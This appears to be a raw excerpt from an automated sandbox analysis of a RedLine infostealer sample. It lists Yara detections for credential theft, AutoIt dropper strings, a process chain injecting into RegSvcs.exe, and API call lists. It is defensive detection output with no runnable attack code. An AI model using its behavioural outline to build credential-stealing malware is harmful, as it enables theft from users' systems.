Source: C:\Users\user\AppData\Local\directory\name.exe	Code function: 6_2_01049576 DefDlgProcW,SendMessageW,GetWindowLongW,SendMessageW,SendMessageW,GetKeyState,GetKeyState,GetKeyState,SendMessageW,GetKeyState,SendMessageW,SendMessageW,SendMessageW,ImageList_SetDragCursorImage,ImageList_BeginDrag,SetCapture,ClientToScreen,ImageList_DragEnter,InvalidateRect,ReleaseCapture,GetCursorPos,ScreenToClient,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetCursorPos,ScreenToClient,GetParent,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,GetWindowLongW,		6_2_01049576

System Summary

Malicious sample detected (through community Yara rule)

Source: 6.2.name.exe.3670000.1.raw.unpack, type: UNPACKEDPE	Matched rule: Detects RedLine infostealer Author: ditekSHen
Source: 10.2.name.exe.12a0000.1.raw.unpack, type: UNPACKEDPE	Matched rule: Detects RedLine infostealer Author: ditekSHen
Source: 7.2.RegSvcs.exe.2ae0000.4.unpack, type: UNPACKEDPE	Matched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
Source: 7.2.RegSvcs.exe.2ae0ee8.3.unpack, type: UNPACKEDPE	Matched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
Source: 7.2.RegSvcs.exe.274f4de.2.unpack, type: UNPACKEDPE	Matched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
Source: 7.2.RegSvcs.exe.3b46458.6.raw.unpack, type: UNPACKEDPE	Matched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
Source: 7.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Detects RedLine infostealer Author: ditekSHen
Source: 7.2.RegSvcs.exe.3b93d90.5.unpack, type: UNPACKEDPE	Matched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
Source: 7.2.RegSvcs.exe.274f4de.2.raw.unpack, type: UNPACKEDPE	Matched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
Source: 7.2.RegSvcs.exe.3b93d90.5.raw.unpack, type: UNPACKEDPE	Matched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
Source: 7.2.RegSvcs.exe.5240000.8.raw.unpack, type: UNPACKEDPE	Matched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
Source: 7.2.RegSvcs.exe.2ae0ee8.3.raw.unpack, type: UNPACKEDPE	Matched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
Source: 7.2.RegSvcs.exe.27503c6.1.unpack, type: UNPACKEDPE	Matched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
Source: 7.2.RegSvcs.exe.3b46458.6.unpack, type: UNPACKEDPE	Matched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
Source: 7.2.RegSvcs.exe.5240000.8.unpack, type: UNPACKEDPE	Matched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
Source: 7.2.RegSvcs.exe.3b45570.7.unpack, type: UNPACKEDPE	Matched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
Source: 7.2.RegSvcs.exe.3b45570.7.raw.unpack, type: UNPACKEDPE	Matched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
Source: 7.2.RegSvcs.exe.27503c6.1.raw.unpack, type: UNPACKEDPE	Matched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
Source: 7.2.RegSvcs.exe.2ae0000.4.raw.unpack, type: UNPACKEDPE	Matched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
Source: 7.2.RegSvcs.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Detects RedLine infostealer Author: ditekSHen
Source: 00000007.00000002.3833407043.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Detects RedLine infostealer Author: ditekSHen
Source: 00000006.00000002.3720636618.0000000003670000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects RedLine infostealer Author: ditekSHen
Source: 0000000A.00000002.3833226149.00000000012A0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects RedLine infostealer Author: ditekSHen
Source: 00000007.00000002.3837117368.0000000002AE0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
Source: 00000007.00000002.3840117375.0000000005240000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen

Binary is likely a compiled AutoIt script file

Source: F#U0130YAT TEKL#U0130F.exe	String found in binary or memory: This is a third-party compiled AutoIt script.
Source: F#U0130YAT TEKL#U0130F.exe, 00000000.00000000.2100955084.0000000000A42000.00000002.00000001.01000000.00000003.sdmp	String found in binary or memory: This is a third-party compiled AutoIt script.	memstr_8d142966-d
Source: F#U0130YAT TEKL#U0130F.exe, 00000000.00000000.2100955084.0000000000A42000.00000002.00000001.01000000.00000003.sdmp	String found in binary or memory: AnyArabicArmenianAvestanBalineseBamumBassa_VahBatakBengaliBopomofoBrahmiBrailleBugineseBuhidCCanadian_AboriginalCarianCaucasian_AlbanianCcCfChakmaChamCherokeeCnCoCommonCopticCsCuneiformCypriotCyrillicDeseretDevanagariDuployanEgyptian_HieroglyphsElbasanEthiopicGeorgianGlagoliticGothicGranthaGreekGujaratiGurmukhiHanHangulHanunooHebrewHiraganaImperial_AramaicInheritedInscriptional_PahlaviInscriptional_ParthianJavaneseKaithiKannadaKatakanaKayah_LiKharoshthiKhmerKhojkiKhudawadiLL&LaoLatinLepchaLimbuLinear_ALinear_BLisuLlLmLoLtLuLycianLydianMMahajaniMalayalamMandaicManichaeanMcMeMeetei_MayekMende_KikakuiMeroitic_CursiveMeroitic_HieroglyphsMiaoMnModiMongolianMroMyanmarNNabataeanNdNew_Tai_LueNkoNlNoOghamOl_ChikiOld_ItalicOld_North_ArabianOld_PermicOld_PersianOld_South_ArabianOld_TurkicOriyaOsmanyaPPahawh_HmongPalmyrenePau_Cin_HauPcPdPePfPhags_PaPhoenicianPiPoPsPsalter_PahlaviRejangRunicSSamaritanSaurashtraScSharadaShavianSiddhamSinhalaSkSmSoSora_SompengSundaneseSyloti_NagriSyriacTagalogTagbanwaTai_LeTai_ThamTai_VietTakriTamilTeluguThaanaThaiTibetanTifinaghTirhutaUgariticVaiWarang_CitiXanXpsXspXucXwdYiZZlZpZsSDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBoxSHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainer	memstr_922c6992-b
Source: F#U0130YAT TEKL#U0130F.exe, 00000000.00000003.3687606553.0000000004091000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: This is a third-party compiled AutoIt script.	memstr_70620fdc-6
Source: F#U0130YAT TEKL#U0130F.exe, 00000000.00000003.3687606553.0000000004091000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: AnyArabicArmenianAvestanBalineseBamumBassa_VahBatakBengaliBopomofoBrahmiBrailleBugineseBuhidCCanadian_AboriginalCarianCaucasian_AlbanianCcCfChakmaChamCherokeeCnCoCommonCopticCsCuneiformCypriotCyrillicDeseretDevanagariDuployanEgyptian_HieroglyphsElbasanEthiopicGeorgianGlagoliticGothicGranthaGreekGujaratiGurmukhiHanHangulHanunooHebrewHiraganaImperial_AramaicInheritedInscriptional_PahlaviInscriptional_ParthianJavaneseKaithiKannadaKatakanaKayah_LiKharoshthiKhmerKhojkiKhudawadiLL&LaoLatinLepchaLimbuLinear_ALinear_BLisuLlLmLoLtLuLycianLydianMMahajaniMalayalamMandaicManichaeanMcMeMeetei_MayekMende_KikakuiMeroitic_CursiveMeroitic_HieroglyphsMiaoMnModiMongolianMroMyanmarNNabataeanNdNew_Tai_LueNkoNlNoOghamOl_ChikiOld_ItalicOld_North_ArabianOld_PermicOld_PersianOld_South_ArabianOld_TurkicOriyaOsmanyaPPahawh_HmongPalmyrenePau_Cin_HauPcPdPePfPhags_PaPhoenicianPiPoPsPsalter_PahlaviRejangRunicSSamaritanSaurashtraScSharadaShavianSiddhamSinhalaSkSmSoSora_SompengSundaneseSyloti_NagriSyriacTagalogTagbanwaTai_LeTai_ThamTai_VietTakriTamilTeluguThaanaThaiTibetanTifinaghTirhutaUgariticVaiWarang_CitiXanXpsXspXucXwdYiZZlZpZsSDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBoxSHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainer	memstr_24c62a24-e
Source: name.exe	String found in binary or memory: This is a third-party compiled AutoIt script.
Source: name.exe, 00000006.00000002.3719840683.0000000001072000.00000002.00000001.01000000.00000005.sdmp	String found in binary or memory: This is a third-party compiled AutoIt script.	memstr_d332f53c-2
Source: name.exe, 00000006.00000002.3719840683.0000000001072000.00000002.00000001.01000000.00000005.sdmp	String found in binary or memory: AnyArabicArmenianAvestanBalineseBamumBassa_VahBatakBengaliBopomofoBrahmiBrailleBugineseBuhidCCanadian_AboriginalCarianCaucasian_AlbanianCcCfChakmaChamCherokeeCnCoCommonCopticCsCuneiformCypriotCyrillicDeseretDevanagariDuployanEgyptian_HieroglyphsElbasanEthiopicGeorgianGlagoliticGothicGranthaGreekGujaratiGurmukhiHanHangulHanunooHebrewHiraganaImperial_AramaicInheritedInscriptional_PahlaviInscriptional_ParthianJavaneseKaithiKannadaKatakanaKayah_LiKharoshthiKhmerKhojkiKhudawadiLL&LaoLatinLepchaLimbuLinear_ALinear_BLisuLlLmLoLtLuLycianLydianMMahajaniMalayalamMandaicManichaeanMcMeMeetei_MayekMende_KikakuiMeroitic_CursiveMeroitic_HieroglyphsMiaoMnModiMongolianMroMyanmarNNabataeanNdNew_Tai_LueNkoNlNoOghamOl_ChikiOld_ItalicOld_North_ArabianOld_PermicOld_PersianOld_South_ArabianOld_TurkicOriyaOsmanyaPPahawh_HmongPalmyrenePau_Cin_HauPcPdPePfPhags_PaPhoenicianPiPoPsPsalter_PahlaviRejangRunicSSamaritanSaurashtraScSharadaShavianSiddhamSinhalaSkSmSoSora_SompengSundaneseSyloti_NagriSyriacTagalogTagbanwaTai_LeTai_ThamTai_VietTakriTamilTeluguThaanaThaiTibetanTifinaghTirhutaUgariticVaiWarang_CitiXanXpsXspXucXwdYiZZlZpZsSDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBoxSHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainer	memstr_171f2d48-c
Source: name.exe, 0000000A.00000000.3821165393.0000000001072000.00000002.00000001.01000000.00000005.sdmp	String found in binary or memory: This is a third-party compiled AutoIt script.	memstr_d45bc43a-3
Source: name.exe, 0000000A.00000000.3821165393.0000000001072000.00000002.00000001.01000000.00000005.sdmp	String found in binary or memory: AnyArabicArmenianAvestanBalineseBamumBassa_VahBatakBengaliBopomofoBrahmiBrailleBugineseBuhidCCanadian_AboriginalCarianCaucasian_AlbanianCcCfChakmaChamCherokeeCnCoCommonCopticCsCuneiformCypriotCyrillicDeseretDevanagariDuployanEgyptian_HieroglyphsElbasanEthiopicGeorgianGlagoliticGothicGranthaGreekGujaratiGurmukhiHanHangulHanunooHebrewHiraganaImperial_AramaicInheritedInscriptional_PahlaviInscriptional_ParthianJavaneseKaithiKannadaKatakanaKayah_LiKharoshthiKhmerKhojkiKhudawadiLL&LaoLatinLepchaLimbuLinear_ALinear_BLisuLlLmLoLtLuLycianLydianMMahajaniMalayalamMandaicManichaeanMcMeMeetei_MayekMende_KikakuiMeroitic_CursiveMeroitic_HieroglyphsMiaoMnModiMongolianMroMyanmarNNabataeanNdNew_Tai_LueNkoNlNoOghamOl_ChikiOld_ItalicOld_North_ArabianOld_PermicOld_PersianOld_South_ArabianOld_TurkicOriyaOsmanyaPPahawh_HmongPalmyrenePau_Cin_HauPcPdPePfPhags_PaPhoenicianPiPoPsPsalter_PahlaviRejangRunicSSamaritanSaurashtraScSharadaShavianSiddhamSinhalaSkSmSoSora_SompengSundaneseSyloti_NagriSyriacTagalogTagbanwaTai_LeTai_ThamTai_VietTakriTamilTeluguThaanaThaiTibetanTifinaghTirhutaUgariticVaiWarang_CitiXanXpsXspXucXwdYiZZlZpZsSDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBoxSHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainer	memstr_c9457305-7
Source: F#U0130YAT TEKL#U0130F.exe	String found in binary or memory: This is a third-party compiled AutoIt script.	memstr_8a319ad7-f
Source: F#U0130YAT TEKL#U0130F.exe	String found in binary or memory: AnyArabicArmenianAvestanBalineseBamumBassa_VahBatakBengaliBopomofoBrahmiBrailleBugineseBuhidCCanadian_AboriginalCarianCaucasian_AlbanianCcCfChakmaChamCherokeeCnCoCommonCopticCsCuneiformCypriotCyrillicDeseretDevanagariDuployanEgyptian_HieroglyphsElbasanEthiopicGeorgianGlagoliticGothicGranthaGreekGujaratiGurmukhiHanHangulHanunooHebrewHiraganaImperial_AramaicInheritedInscriptional_PahlaviInscriptional_ParthianJavaneseKaithiKannadaKatakanaKayah_LiKharoshthiKhmerKhojkiKhudawadiLL&LaoLatinLepchaLimbuLinear_ALinear_BLisuLlLmLoLtLuLycianLydianMMahajaniMalayalamMandaicManichaeanMcMeMeetei_MayekMende_KikakuiMeroitic_CursiveMeroitic_HieroglyphsMiaoMnModiMongolianMroMyanmarNNabataeanNdNew_Tai_LueNkoNlNoOghamOl_ChikiOld_ItalicOld_North_ArabianOld_PermicOld_PersianOld_South_ArabianOld_TurkicOriyaOsmanyaPPahawh_HmongPalmyrenePau_Cin_HauPcPdPePfPhags_PaPhoenicianPiPoPsPsalter_PahlaviRejangRunicSSamaritanSaurashtraScSharadaShavianSiddhamSinhalaSkSmSoSora_SompengSundaneseSyloti_NagriSyriacTagalogTagbanwaTai_LeTai_ThamTai_VietTakriTamilTeluguThaanaThaiTibetanTifinaghTirhutaUgariticVaiWarang_CitiXanXpsXspXucXwdYiZZlZpZsSDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBoxSHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainer	memstr_e79f30e5-d
Source: name.exe.0.dr	String found in binary or memory: This is a third-party compiled AutoIt script.	memstr_ee9b2f00-f
Source: name.exe.0.dr	String found in binary or memory: AnyArabicArmenianAvestanBalineseBamumBassa_VahBatakBengaliBopomofoBrahmiBrailleBugineseBuhidCCanadian_AboriginalCarianCaucasian_AlbanianCcCfChakmaChamCherokeeCnCoCommonCopticCsCuneiformCypriotCyrillicDeseretDevanagariDuployanEgyptian_HieroglyphsElbasanEthiopicGeorgianGlagoliticGothicGranthaGreekGujaratiGurmukhiHanHangulHanunooHebrewHiraganaImperial_AramaicInheritedInscriptional_PahlaviInscriptional_ParthianJavaneseKaithiKannadaKatakanaKayah_LiKharoshthiKhmerKhojkiKhudawadiLL&LaoLatinLepchaLimbuLinear_ALinear_BLisuLlLmLoLtLuLycianLydianMMahajaniMalayalamMandaicManichaeanMcMeMeetei_MayekMende_KikakuiMeroitic_CursiveMeroitic_HieroglyphsMiaoMnModiMongolianMroMyanmarNNabataeanNdNew_Tai_LueNkoNlNoOghamOl_ChikiOld_ItalicOld_North_ArabianOld_PermicOld_PersianOld_South_ArabianOld_TurkicOriyaOsmanyaPPahawh_HmongPalmyrenePau_Cin_HauPcPdPePfPhags_PaPhoenicianPiPoPsPsalter_PahlaviRejangRunicSSamaritanSaurashtraScSharadaShavianSiddhamSinhalaSkSmSoSora_SompengSundaneseSyloti_NagriSyriacTagalogTagbanwaTai_LeTai_ThamTai_VietTakriTamilTeluguThaanaThaiTibetanTifinaghTirhutaUgariticVaiWarang_CitiXanXpsXspXucXwdYiZZlZpZsSDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBoxSHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainer	memstr_49987ad0-e

Windows Scripting host queries suspicious COM object (likely to drop second stage)

Source: C:\Windows\System32\wscript.exe

COM Object queried: Windows Script Host Shell Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}

Jump to behavior

Source: C:\Users\user\Desktop\F#U0130YAT TEKL#U0130F.exe

Process Stats: CPU usage > 49%

Source: C:\Users\user\Desktop\F#U0130YAT TEKL#U0130F.exe

Code function: 0_2_009ED5EB: CreateFileW,DeviceIoControl,CloseHandle,

0_2_009ED5EB

Source: C:\Users\user\Desktop\F#U0130YAT TEKL#U0130F.exe

Code function: 0_2_009E1201 LogonUserW,DuplicateTokenEx,CloseHandle,OpenWindowStationW,GetProcessWindowStation,SetProcessWindowStation,OpenDesktopW,_wcslen,LoadUserProfileW,CreateEnvironmentBlock,CreateProcessAsUserW,UnloadUserProfile,GetProcessHeap,HeapFree,CloseWindowStation,CloseDesktop,SetProcessWindowStation,CloseHandle,DestroyEnvironmentBlock,

0_2_009E1201

Source: C:\Users\user\Desktop\F#U0130YAT TEKL#U0130F.exe	Code function: 0_2_009EE8F6 ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState,		0_2_009EE8F6
Source: C:\Users\user\AppData\Local\directory\name.exe	Code function: 6_2_0101E8F6 ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState,		6_2_0101E8F6

Source: C:\Users\user\Desktop\F#U0130YAT TEKL#U0130F.exe	Code function: 0_2_009F2046	0_2_009F2046
Source: C:\Users\user\Desktop\F#U0130YAT TEKL#U0130F.exe	Code function: 0_2_00988060	0_2_00988060
Source: C:\Users\user\Desktop\F#U0130YAT TEKL#U0130F.exe	Code function: 0_2_009E8298	0_2_009E8298
Source: C:\Users\user\Desktop\F#U0130YAT TEKL#U0130F.exe	Code function: 0_2_009BE4FF	0_2_009BE4FF
Source: C:\Users\user\Desktop\F#U0130YAT TEKL#U0130F.exe	Code function: 0_2_009B676B	0_2_009B676B
Source: C:\Users\user\Desktop\F#U0130YAT TEKL#U0130F.exe	Code function: 0_2_00A14873	0_2_00A14873
Source: C:\Users\user\Desktop\F#U0130YAT TEKL#U0130F.exe	Code function: 0_2_009ACAA0	0_2_009ACAA0
Source: C:\Users\user\Desktop\F#U0130YAT TEKL#U0130F.exe	Code function: 0_2_0098CAF0	0_2_0098CAF0
Source: C:\Users\user\Desktop\F#U0130YAT TEKL#U0130F.exe	Code function: 0_2_0099CC39	0_2_0099CC39
Source: C:\Users\user\Desktop\F#U0130YAT TEKL#U0130F.exe	Code function: 0_2_009B6DD9	0_2_009B6DD9
Source: C:\Users\user\Desktop\F#U0130YAT TEKL#U0130F.exe	Code function: 0_2_009891C0	0_2_009891C0
Source: C:\Users\user\Desktop\F#U0130YAT TEKL#U0130F.exe	Code function: 0_2_0099B119	0_2_0099B119
Source: C:\Users\user\Desktop\F#U0130YAT TEKL#U0130F.exe	Code function: 0_2_009A1394	0_2_009A1394
Source: C:\Users\user\Desktop\F#U0130YAT TEKL#U0130F.exe	Code function: 0_2_009A781B	0_2_009A781B
Source: C:\Users\user\Desktop\F#U0130YAT TEKL#U0130F.exe	Code function: 0_2_00987920	0_2_00987920
Source: C:\Users\user\Desktop\F#U0130YAT TEKL#U0130F.exe	Code function: 0_2_0099997D	0_2_0099997D
Source: C:\Users\user\Desktop\F#U0130YAT TEKL#U0130F.exe	Code function: 0_2_009A7A4A	0_2_009A7A4A
Source: C:\Users\user\Desktop\F#U0130YAT TEKL#U0130F.exe	Code function: 0_2_009A7CA7	0_2_009A7CA7
Source: C:\Users\user\Desktop\F#U0130YAT TEKL#U0130F.exe	Code function: 0_2_009B9EEE	0_2_009B9EEE
Source: C:\Users\user\Desktop\F#U0130YAT TEKL#U0130F.exe	Code function: 0_2_00A0BE44	0_2_00A0BE44
Source: C:\Users\user\Desktop\F#U0130YAT TEKL#U0130F.exe	Code function: 0_2_023536C0	0_2_023536C0
Source: C:\Users\user\AppData\Local\directory\name.exe	Code function: 6_2_00FB8060	6_2_00FB8060
Source: C:\Users\user\AppData\Local\directory\name.exe	Code function: 6_2_01022046	6_2_01022046
Source: C:\Users\user\AppData\Local\directory\name.exe	Code function: 6_2_01018298	6_2_01018298
Source: C:\Users\user\AppData\Local\directory\name.exe	Code function: 6_2_00FEE4FF	6_2_00FEE4FF
Source: C:\Users\user\AppData\Local\directory\name.exe	Code function: 6_2_00FE676B	6_2_00FE676B
Source: C:\Users\user\AppData\Local\directory\name.exe	Code function: 6_2_01044873	6_2_01044873
Source: C:\Users\user\AppData\Local\directory\name.exe	Code function: 6_2_00FBCAF0	6_2_00FBCAF0
Source: C:\Users\user\AppData\Local\directory\name.exe	Code function: 6_2_00FDCAA0	6_2_00FDCAA0
Source: C:\Users\user\AppData\Local\directory\name.exe	Code function: 6_2_00FCCC39	6_2_00FCCC39
Source: C:\Users\user\AppData\Local\directory\name.exe	Code function: 6_2_00FE6DD9	6_2_00FE6DD9
Source: C:\Users\user\AppData\Local\directory\name.exe	Code function: 6_2_00FB91C0	6_2_00FB91C0
Source: C:\Users\user\AppData\Local\directory\name.exe	Code function: 6_2_00FCB119	6_2_00FCB119
Source: C:\Users\user\AppData\Local\directory\name.exe	Code function: 6_2_00FD1394	6_2_00FD1394
Source: C:\Users\user\AppData\Local\directory\name.exe	Code function: 6_2_00FD781B	6_2_00FD781B
Source: C:\Users\user\AppData\Local\directory\name.exe	Code function: 6_2_00FC997D	6_2_00FC997D
Source: C:\Users\user\AppData\Local\directory\name.exe	Code function: 6_2_00FB7920	6_2_00FB7920
Source: C:\Users\user\AppData\Local\directory\name.exe	Code function: 6_2_00FD7A4A	6_2_00FD7A4A
Source: C:\Users\user\AppData\Local\directory\name.exe	Code function: 6_2_00FD7CA7	6_2_00FD7CA7
Source: C:\Users\user\AppData\Local\directory\name.exe	Code function: 6_2_00FE9EEE	6_2_00FE9EEE
Source: C:\Users\user\AppData\Local\directory\name.exe	Code function: 6_2_0103BE44	6_2_0103BE44
Source: C:\Users\user\AppData\Local\directory\name.exe	Code function: 6_2_00FA36C0	6_2_00FA36C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_00408C60	7_2_00408C60
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_0040DC11	7_2_0040DC11
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_00407C3F	7_2_00407C3F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_00418CCC	7_2_00418CCC
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_00406CA0	7_2_00406CA0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_004028B0	7_2_004028B0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_0041A4BE	7_2_0041A4BE
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_00418244	7_2_00418244
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_00401650	7_2_00401650
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_00402F20	7_2_00402F20
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_004193C4	7_2_004193C4
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_00418788	7_2_00418788
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_00402F89	7_2_00402F89
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_00402B90	7_2_00402B90
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_004073A0	7_2_004073A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_028ECE88	7_2_028ECE88
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_028EDAA0	7_2_028EDAA0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_028ED1D0	7_2_028ED1D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_028E0FD0	7_2_028E0FD0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_028E1030	7_2_028E1030
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_0614EE88	7_2_0614EE88
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_06149688	7_2_06149688
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_0614BCE8	7_2_0614BCE8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_06145A70	7_2_06145A70
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_06146268	7_2_06146268
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_06140040	7_2_06140040
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_0614F5E8	7_2_0614F5E8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_06140006	7_2_06140006
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_06565240	7_2_06565240
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_0656A0E0	7_2_0656A0E0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_065661C8	7_2_065661C8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_06561530	7_2_06561530
Source: C:\Users\user\AppData\Local\directory\name.exe	Code function: 10_2_011636C0	10_2_011636C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 11_2_0316CE98	11_2_0316CE98
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 11_2_0316DAB0	11_2_0316DAB0
